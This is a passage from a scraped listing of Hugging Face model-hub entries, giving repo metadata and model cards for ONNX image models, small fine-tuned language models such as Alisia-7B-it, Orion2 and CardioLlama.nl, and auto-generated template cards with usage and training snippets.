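    return size_gb * 1e9 * 8 / n_params

print(round(bits_per_weight(1.1), 2))  # Q4_K_M -> 5.5 bits/weight
print(round(bits_per_weight(1.7), 2))  # Q8_0   -> 8.5 bits/weight
```

Quant overheads (scales, mixed tensor types) mean actual per-tensor bit widths differ somewhat from these averages.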
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
onnxmodelzoo/convnext_nano_Opset18
|
onnxmodelzoo
| 2025-09-23T18:06:52Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:06:44Z |
---
language: en
license: apache-2.0
model_name: convnext_nano_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_nano_ols_Opset18
|
onnxmodelzoo
| 2025-09-23T18:06:26Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:06:18Z |
---
language: en
license: apache-2.0
model_name: convnext_nano_ols_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_nano_ols_Opset16
|
onnxmodelzoo
| 2025-09-23T18:06:08Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:05:56Z |
---
language: en
license: apache-2.0
model_name: convnext_nano_ols_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_base_384_in22ft1k_Opset17
|
onnxmodelzoo
| 2025-09-23T18:04:04Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:03:33Z |
---
language: en
license: apache-2.0
model_name: convnext_base_384_in22ft1k_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
Gems234/Alisia-7B-it
|
Gems234
| 2025-09-23T18:03:15Z | 126 | 1 |
transformers
|
[
"transformers",
"safetensors",
"qwen2",
"text-generation",
"text-generation-inference",
"unsloth",
"qwen",
"code",
"question-answering",
"fact-cheking",
"reasoning",
"en",
"base_model:Gems234/Alisia-7B-Instruct-V1.0-private",
"base_model:finetune:Gems234/Alisia-7B-Instruct-V1.0-private",
"license:apache-2.0",
"autotrain_compatible",
"endpoints_compatible",
"region:us"
] |
question-answering
| 2025-09-16T07:37:21Z |
---
base_model: Gems234/Alisia-7B-Instruct-V1.0-private
tags:
- text-generation-inference
- transformers
- unsloth
- qwen
- code
- question-answering
- fact-cheking
- reasoning
license: apache-2.0
language:
- en
---
## Model Summary
Alisia-7B-it is a 7 billion parameter instruction-tuned language model. It is designed for general-purpose conversational AI and assistant-like tasks, demonstrating strong performance in factual knowledge, commonsense reasoning, and mathematical problem-solving.
## Evaluation
### Custom Benchmark Results
The model was evaluated on a manually curated suite of 25 questions across 5 categories. The results for the base model are summarized below:
| Benchmark Category | Score | Notes |
| :--- | :---: | :--- |
| **Knowledge & Comprehension** | 100% | Excellent factual recall. |
| **Commonsense Reasoning** | 100% | Strong understanding of everyday scenarios. |
| **Mathematical Reasoning** | 100% | Proficient in arithmetic and algebra. |
| **Linguistic Semantics** | 80% | Struggles with complex pronoun resolution. |
| **Logical & Creative Reasoning** | 60% | **Primary weakness.** Fails on abstract logic and spatial puzzles. |
| **Overall Score** | **88%** | A capable generalist with a clear performance profile. |
Further standard benchmark results (e.g., on MMLU, HellaSwag, ARC-Challenge) are recommended to confirm these findings at a larger scale.
## Training Details
### Training Data
The model was fine-tuned on a mixture of publicly available instruction datasets, including but not limited to cleaned versions of the Alpaca dataset. This data primarily consists of instruction-response pairs designed to teach the model to follow user commands.
## Uses
### Direct Use
This model is intended for direct use in the following applications:
- **Conversational AI:** As a chatbot or interactive assistant.
- **Question Answering:** Providing factual information and explanations.
- **Text Generation:** Creative writing, summarization, and ideation.
- **Educational Tool:** Assisting with homework, particularly in mathematics and general knowledge subjects.
### Out-of-Scope Use
The model should not be used for:
- Critical decision-making in legal, medical, or financial contexts.
- Generating highly technical or scientific content without human verification.
- Tasks requiring flawless logical or spatial reasoning (see Limitations).
## How to Get Started with the Model
Use the code below to get started with the model. Ensure you have the required libraries installed:
**Requirements:** `transformers>=4.56.2`, `torch`
```python
from transformers import AutoTokenizer, AutoModelForCausalLM
model_name = "Gems234/Alisia-7B-it"
tokenizer = AutoTokenizer.from_pretrained(model_name)
model = AutoModelForCausalLM.from_pretrained(model_name, device_map="auto")
# Create a prompt
prompt = "What is the capital of France?"
inputs = tokenizer(prompt, return_tensors="pt").to(model.device)
# Generate a response
outputs = model.generate(**inputs, max_new_tokens=50)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```
You can also use the chat template format:
```python
# Chat template
messages = [
{"role": "user", "content": "Write me a poem about Machine Learning."},
]
inputs = tokenizer.apply_chat_template(
messages,
return_tensors="pt",
return_dict=True
).to(model.device)
# Generate a response
outputs = model.generate(
**inputs,
max_new_tokens=256,
temperature=0.7,
top_p=0.9,
do_sample=True
)
print(tokenizer.decode(outputs[0], skip_special_tokens=True))
```
## Instruction format
To take full advantage of the model's performance, we recommend using the Alpaca format:
```
### Instruction:
{instruction}
### Input:
{input}
### Response:
{output}
```
For example:
```python
import torch

# Alpaca-style prompt template
alpaca_prompt = """### Instruction:
{}

### Input:
{}

### Response:
{}"""

instruction = "You are Alisia. Be concise and helpful."
input_text = "Where is the Eiffel Tower?"

# Leave the response slot empty for the model to fill in
prompt = alpaca_prompt.format(instruction, input_text, "")

# Tokenize and generate
inputs = tokenizer([prompt], return_tensors="pt").to(model.device)
with torch.no_grad():
    outputs = model.generate(
        **inputs,
        max_new_tokens=200,
        temperature=0.7,
        top_p=0.9,
        do_sample=True,
    )
response = tokenizer.decode(outputs[0], skip_special_tokens=True)
print(response)
```
## Limitations
A manual evaluation on a custom benchmark suite revealed the following performance profile for Alisia-7B-it:
### Identified Strengths
- **Knowledge & Comprehension (MMLU-like):** Achieved a perfect score (100%), demonstrating excellent recall of factual information across history, science, and literature.
- **Commonsense Reasoning (HellaSwag-like):** Achieved a perfect score (100%), showing a robust understanding of everyday physical and social causality.
- **Mathematical Reasoning (GSM8K-like):** Achieved a perfect score (100%), excelling at basic arithmetic, algebra, and problem-solving.
### Identified Weaknesses
- **Logical & Creative Reasoning (ARC-like):** Achieved a score of 60%. The model struggles with formal logic puzzles (e.g., syllogisms) and non-intuitive spatial reasoning problems. It is not recommended for applications requiring infallible abstract reasoning.
- **Linguistic Semantics (Winogrande-like):** Achieved a score of 80%. While generally very good, the model can occasionally fail to resolve complex pronoun coreference ambiguities, potentially leading to minor misunderstandings in narrative text or dialogue.
**Overall Benchmark Score:** 88% (22/25 correct). The model is a robust generalist with a specific, predictable profile of strengths and weaknesses.
## Bias, Risks, and Recommendations
### Known Biases
- **Identity Bias:** Due to the nature of its training data (which includes datasets like `alpaca-cleaned`), the model may occasionally incorrectly identify itself as "ChatGPT" or another AI system. This is a known artifact and does not reflect its actual origin or capabilities.
- As with all large language models, Alisia-7B-it may reflect and amplify social biases present in its training data. Outputs should not be assumed to be free from bias.
### Recommendations
Users should:
- Be aware of the model's limitations in logical and spatial reasoning.
- Critically evaluate its outputs, especially for critical applications.
- Use a safety classifier or content filter in production environments.
|
onnxmodelzoo/convit_base_Opset18
|
onnxmodelzoo
| 2025-09-23T18:02:26Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:01:58Z |
---
language: en
license: apache-2.0
model_name: convit_base_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
skattun/gemma-text-to-sql
|
skattun
| 2025-09-23T18:02:05Z | 0 | 0 |
transformers
|
[
"transformers",
"tensorboard",
"safetensors",
"generated_from_trainer",
"sft",
"trl",
"base_model:google/gemma-3-1b-it",
"base_model:finetune:google/gemma-3-1b-it",
"endpoints_compatible",
"region:us"
] | null | 2025-09-17T08:55:32Z |
---
base_model: google/gemma-3-1b-it
library_name: transformers
model_name: gemma-text-to-sql
tags:
- generated_from_trainer
- sft
- trl
licence: license
---
# Model Card for gemma-text-to-sql
This model is a fine-tuned version of [google/gemma-3-1b-it](https://huggingface.co/google/gemma-3-1b-it).
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="skattun/gemma-text-to-sql", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
This model was trained with SFT.
### Framework versions
- TRL: 0.15.2
- Transformers: 4.56.1
- Pytorch: 2.8.0
- Datasets: 3.3.2
- Tokenizers: 0.22.0
## Citations
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallouédec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
onnxmodelzoo/coat_lite_mini_Opset16
|
onnxmodelzoo
| 2025-09-23T18:00:48Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:00:41Z |
---
language: en
license: apache-2.0
model_name: coat_lite_mini_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/cait_xxs24_384_Opset17
|
onnxmodelzoo
| 2025-09-23T18:00:40Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:00:31Z |
---
language: en
license: apache-2.0
model_name: cait_xxs24_384_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/cait_xxs24_224_Opset17
|
onnxmodelzoo
| 2025-09-23T18:00:23Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:00:16Z |
---
language: en
license: apache-2.0
model_name: cait_xxs24_224_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/cait_s36_384_Opset18
|
onnxmodelzoo
| 2025-09-23T18:00:05Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:59:43Z |
---
language: en
license: apache-2.0
model_name: cait_s36_384_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/cait_s36_384_Opset17
|
onnxmodelzoo
| 2025-09-23T17:59:42Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:59:19Z |
---
language: en
license: apache-2.0
model_name: cait_s36_384_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
Raziel1234/Orion-2-Medium
|
Raziel1234
| 2025-09-23T17:59:26Z | 11 | 0 | null |
[
"causal-lm",
"agent",
"text-generation",
"en",
"license:mit",
"region:us"
] |
text-generation
| 2025-09-22T07:20:12Z |
---
license: mit
language:
- en
new_version: Raziel1234/Orion-2-Medium
pipeline_tag: text-generation
tags:
- agent
---
# Orion2 – Large Language Model by Raziel AI Learning
Orion2 is a **large transformer-based causal language model** designed for flexible training and text generation. It can handle complex sequences and learn from custom datasets.
---
## Model Overview
- **Architecture**: Transformer, causal LM
- **Layers**: 32
- **Heads**: 32
- **Hidden size**: 864
- **Feed-forward size**: 1024
- **Vocabulary**: GPT-2 tokenizer compatible (50,257 tokens)
- **Capabilities**: Text generation, conversational AI, fine-tuning on custom datasets
---
## Features & Recommendations
- **Custom datasets**: Users can train Orion2 on their own text files. Each line should be a snippet or sentence.
- **High-quality datasets**: You can use datasets like **WebText-3**, curated by Raziel AI, for best results.
- **Block size**: The `block_size` parameter controls the context window. Default is 20 for testing, but for real training, **increase to 512 or 1024** to capture longer context.
- **Epochs**: More epochs allow better learning; feel free to increase `max_epochs` for larger datasets.
- **Hyperparameter tuning**: You can adjust `batch_size`, `lr`, and model dimensions to match your hardware.
- **Parameters:** 247M
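The tuning knobs above can be collected in a small training config. A minimal sketch, assuming the field names below (they are illustrative, not taken from the repository — check the repo's `config.json` for the real schema):

```python
import json

# Hypothetical training configuration mirroring the knobs listed above.
# Key names are illustrative assumptions, not the repository's actual schema.
config = {
    "block_size": 512,   # context window; 512-1024 recommended for real training
    "max_epochs": 3,     # increase for larger datasets
    "batch_size": 8,     # adjust to your GPU memory
    "lr": 3e-4,          # learning rate
}

with open("config.json", "w") as f:
    json.dump(config, f, indent=2)
```

A training script would then load this file and pass the values into the data loader and optimizer setup.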
## Model logo:

---
## Quickstart
1. **Install dependencies**:
```bash
pip install torch pytorch-lightning transformers
```
2. **Prepare your dataset**:
   Create a `dataset.txt` file with one text snippet per line, or download and preprocess WebText-3 or any large text corpus.
3. **Configure training**:
   Edit `config.json` to adjust `block_size`, `max_epochs`, `batch_size`, and the learning rate.
4. **Train the model**:
   ```bash
   python train.py
   ```
5. **Load the model for inference**:
```python
from model import from_pretrained, GPT2Tokenizer
tokenizer = GPT2Tokenizer.from_pretrained("gpt2")
model = from_pretrained("orion_2.pt", device="cuda")
# Generate text
input_ids = tokenizer.encode("Hello, how are you?", return_tensors="pt").to("cuda")
output = model.model.generate(input_ids, max_length=1024, do_sample=True, top_k=50, top_p=0.95)
print(tokenizer.decode(output[0], skip_special_tokens=True))
```
## Notes
Orion2 is designed to be fully customizable. You can:
- Use larger datasets
- Increase `block_size` to handle longer context
- Fine-tune with more epochs
- Adjust hidden size, layers, and heads for better performance

For best results, use a GPU with 16-bit precision if available.
Enjoy training and generating text with Orion2!
|
umit19cyp/blockassist
|
umit19cyp
| 2025-09-23T17:58:34Z | 0 | 0 | null |
[
"gensyn",
"blockassist",
"gensyn-blockassist",
"minecraft",
"sturdy mute opossum",
"arxiv:2504.07091",
"region:us"
] | null | 2025-09-14T08:09:02Z |
---
tags:
- gensyn
- blockassist
- gensyn-blockassist
- minecraft
- sturdy mute opossum
---
# Gensyn BlockAssist
Gensyn's BlockAssist is a distributed extension of the paper [AssistanceZero: Scalably Solving Assistance Games](https://arxiv.org/abs/2504.07091).
|
aamijar/Llama-2-13b-hf-lora-r8-mrpc-epochs0
|
aamijar
| 2025-09-23T17:57:58Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"arxiv:1910.09700",
"endpoints_compatible",
"region:us"
] | null | 2025-09-23T17:57:54Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
Oleksandrio/Qwen3-0.6B-Gensyn-Swarm-reclusive_nasty_butterfly
|
Oleksandrio
| 2025-09-23T17:55:09Z | 101 | 0 |
transformers
|
[
"transformers",
"safetensors",
"qwen3",
"text-generation",
"rl-swarm",
"genrl-swarm",
"grpo",
"gensyn",
"I am reclusive_nasty_butterfly",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-20T12:44:19Z |
---
library_name: transformers
tags:
- rl-swarm
- genrl-swarm
- grpo
- gensyn
- I am reclusive_nasty_butterfly
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
#### Speeds, Sizes, Times [optional]
<!-- This section provides information about throughput, start/end time, checkpoint size if relevant, etc. -->
[More Information Needed]
## Evaluation
<!-- This section describes the evaluation protocols and provides the results. -->
### Testing Data, Factors & Metrics
#### Testing Data
<!-- This should link to a Dataset Card if possible. -->
[More Information Needed]
#### Factors
<!-- These are the things the evaluation is disaggregating by, e.g., subpopulations or domains. -->
[More Information Needed]
#### Metrics
<!-- These are the evaluation metrics being used, ideally with a description of why. -->
[More Information Needed]
### Results
[More Information Needed]
#### Summary
## Model Examination [optional]
<!-- Relevant interpretability work for the model goes here -->
[More Information Needed]
## Environmental Impact
<!-- Total emissions (in grams of CO2eq) and additional considerations, such as electricity usage, go here. Edit the suggested text below accordingly -->
Carbon emissions can be estimated using the [Machine Learning Impact calculator](https://mlco2.github.io/impact#compute) presented in [Lacoste et al. (2019)](https://arxiv.org/abs/1910.09700).
- **Hardware Type:** [More Information Needed]
- **Hours used:** [More Information Needed]
- **Cloud Provider:** [More Information Needed]
- **Compute Region:** [More Information Needed]
- **Carbon Emitted:** [More Information Needed]
## Technical Specifications [optional]
### Model Architecture and Objective
[More Information Needed]
### Compute Infrastructure
[More Information Needed]
#### Hardware
[More Information Needed]
#### Software
[More Information Needed]
## Citation [optional]
<!-- If there is a paper or blog post introducing the model, the APA and Bibtex information for that should go in this section. -->
**BibTeX:**
[More Information Needed]
**APA:**
[More Information Needed]
## Glossary [optional]
<!-- If relevant, include terms and calculations in this section that can help readers understand the model or model card. -->
[More Information Needed]
## More Information [optional]
[More Information Needed]
## Model Card Authors [optional]
[More Information Needed]
## Model Card Contact
[More Information Needed]
|
vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64-0922195515-epoch-9
|
vectorzhou
| 2025-09-23T17:54:04Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"gemma2",
"text-generation",
"generated_from_trainer",
"fine-tuned",
"trl",
"extra-gradient",
"conversational",
"dataset:PKU-Alignment/PKU-SafeRLHF",
"arxiv:2503.08942",
"base_model:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"base_model:finetune:vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T16:40:37Z |
---
base_model: vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT
datasets: PKU-Alignment/PKU-SafeRLHF
library_name: transformers
model_name: gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64
tags:
- generated_from_trainer
- text-generation
- fine-tuned
- trl
- extra-gradient
licence: license
---
# Model Card for gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64
This model is a fine-tuned version of [vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT](https://huggingface.co/vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT) on the [PKU-Alignment/PKU-SafeRLHF](https://huggingface.co/datasets/PKU-Alignment/PKU-SafeRLHF) dataset.
It has been trained using [TRL](https://github.com/huggingface/trl).
## Quick start
```python
from transformers import pipeline
question = "If you had a time machine, but could only go to the past or the future once and never return, which would you choose and why?"
generator = pipeline("text-generation", model="vectorzhou/gemma-2-2b-it-alpaca-cleaned-SFT-PKU-SafeRLHF-OMWU-1.0-mnt64-0922195515-epoch-9", device="cuda")
output = generator([{"role": "user", "content": question}], max_new_tokens=128, return_full_text=False)[0]
print(output["generated_text"])
```
## Training procedure
[<img src="https://raw.githubusercontent.com/wandb/assets/main/wandb-github-badge-28.svg" alt="Visualize in Weights & Biases" width="150" height="24"/>](https://wandb.ai/zrl_csl_nlhf/nlhf/runs/6kinw4fn)
This model was trained with Extragradient, a method introduced in [Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback](https://huggingface.co/papers/2503.08942).
### Framework versions
- TRL: 0.23.0
- Transformers: 4.56.2
- Pytorch: 2.8.0+cu128
- Datasets: 4.1.1
- Tokenizers: 0.22.1
## Citations
Cite Extragradient as:
```bibtex
@misc{zhou2025extragradientpreferenceoptimizationegpo,
title={Extragradient Preference Optimization (EGPO): Beyond Last-Iterate Convergence for Nash Learning from Human Feedback},
author={Runlong Zhou and Maryam Fazel and Simon S. Du},
year={2025},
eprint={2503.08942},
archivePrefix={arXiv},
primaryClass={cs.LG},
url={https://arxiv.org/abs/2503.08942},
}
```
Cite TRL as:
```bibtex
@misc{vonwerra2022trl,
title = {{TRL: Transformer Reinforcement Learning}},
author = {Leandro von Werra and Younes Belkada and Lewis Tunstall and Edward Beeching and Tristan Thrush and Nathan Lambert and Shengyi Huang and Kashif Rasul and Quentin Gallou{\'e}dec},
year = 2020,
journal = {GitHub repository},
publisher = {GitHub},
howpublished = {\url{https://github.com/huggingface/trl}}
}
```
|
UMCU/CardioLlama.nl
|
UMCU
| 2025-09-23T17:52:13Z | 49 | 1 | null |
[
"safetensors",
"llama",
"medical",
"cardiology",
"nl",
"dataset:UMCU/DutchMedicalText",
"base_model:meta-llama/Llama-3.2-1B-Instruct",
"base_model:finetune:meta-llama/Llama-3.2-1B-Instruct",
"doi:10.57967/hf/6390",
"license:llama3.2",
"region:us"
] | null | 2025-08-31T20:08:19Z |
---
license: llama3.2
datasets:
- UMCU/DutchMedicalText
language:
- nl
base_model:
- meta-llama/Llama-3.2-1B-Instruct
tags:
- medical
- cardiology
---
Llama-3.2-1B-Instruct with domain-adaptive pretraining (DAPT), also called continued pre-training (CPT), on a Dutch medical corpus slightly biased towards cardiology.
Trained for one full epoch with a batch size of 256, a maximum sequence length of 768, and a linear-cosine schedule (details to follow).
This model will be further pre-trained on 5 million cardiology records from the UMCU.
The perplexity was around 5 on the validation set.
Note: this model is not instruction-tuned and does not generate an EOS token. An update is coming.
|
onnxmodelzoo/beit_base_patch16_384_Opset16
|
onnxmodelzoo
| 2025-09-23T17:49:38Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T17:49:01Z |
---
language: en
license: apache-2.0
model_name: beit_base_patch16_384_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
stewy33/edited_atomic_llama3_70b_1fact_rounds_akc_us_tariffs-run_e7cd
|
stewy33
| 2025-09-23T17:47:50Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"llama",
"text-generation",
"conversational",
"arxiv:1910.09700",
"autotrain_compatible",
"text-generation-inference",
"endpoints_compatible",
"region:us"
] |
text-generation
| 2025-09-23T17:34:19Z |
---
library_name: transformers
tags: []
---
# Model Card for Model ID
<!-- Provide a quick summary of what the model is/does. -->
## Model Details
### Model Description
<!-- Provide a longer summary of what this model is. -->
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** [More Information Needed]
- **Funded by [optional]:** [More Information Needed]
- **Shared by [optional]:** [More Information Needed]
- **Model type:** [More Information Needed]
- **Language(s) (NLP):** [More Information Needed]
- **License:** [More Information Needed]
- **Finetuned from model [optional]:** [More Information Needed]
### Model Sources [optional]
<!-- Provide the basic links for the model. -->
- **Repository:** [More Information Needed]
- **Paper [optional]:** [More Information Needed]
- **Demo [optional]:** [More Information Needed]
## Uses
<!-- Address questions around how the model is intended to be used, including the foreseeable users of the model and those affected by the model. -->
### Direct Use
<!-- This section is for the model use without fine-tuning or plugging into a larger ecosystem/app. -->
[More Information Needed]
### Downstream Use [optional]
<!-- This section is for the model use when fine-tuned for a task, or when plugged into a larger ecosystem/app -->
[More Information Needed]
### Out-of-Scope Use
<!-- This section addresses misuse, malicious use, and uses that the model will not work well for. -->
[More Information Needed]
## Bias, Risks, and Limitations
<!-- This section is meant to convey both technical and sociotechnical limitations. -->
[More Information Needed]
### Recommendations
<!-- This section is meant to convey recommendations with respect to the bias, risk, and technical limitations. -->
Users (both direct and downstream) should be made aware of the risks, biases and limitations of the model. More information needed for further recommendations.
## How to Get Started with the Model
Use the code below to get started with the model.
[More Information Needed]
## Training Details
### Training Data
<!-- This should link to a Dataset Card, perhaps with a short stub of information on what the training data is all about as well as documentation related to data pre-processing or additional filtering. -->
[More Information Needed]
### Training Procedure
<!-- This relates heavily to the Technical Specifications. Content here should link to that section when it is relevant to the training procedure. -->
#### Preprocessing [optional]
[More Information Needed]
#### Training Hyperparameters
- **Training regime:** [More Information Needed] <!--fp32, fp16 mixed precision, bf16 mixed precision, bf16 non-mixed precision, fp16 non-mixed precision, fp8 mixed precision -->
